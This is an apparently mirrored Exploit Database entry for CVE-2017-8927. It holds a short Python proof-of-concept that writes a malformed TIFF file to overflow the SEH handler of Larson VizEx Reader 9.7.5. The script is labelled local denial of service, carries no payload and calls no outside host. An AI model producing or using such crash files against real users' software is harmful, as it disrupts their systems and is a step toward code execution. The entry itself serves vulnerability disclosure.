Larson VizEx Reader 9.7.5 – Local Buffer Overflow (SEH)

• Exploit Database
• 100 阅读

• 作者： Muhann4d
  日期： 2017-05-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42002/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  #!/usr/bin/python # Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH) # Date: 14/05/2017 # Exploit Author: Muhann4d # CVE : CVE-2017-8927 # Vendor Homepage : http://www.cgmlarson.com/ # Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html # Affected Versions : 9.7.5 # Category: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional SP1 32bit # Proof of Concept: run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5   # Vendor has been cantacted but no reply   buf = "\x41" * 800 buff = "\x42" * 4 bufff = "\x43" * 4 buffff = "\x44" * 9999 f = open ("poc.tif", "w") f.write(buf + buff + bufff + buffff) f.close()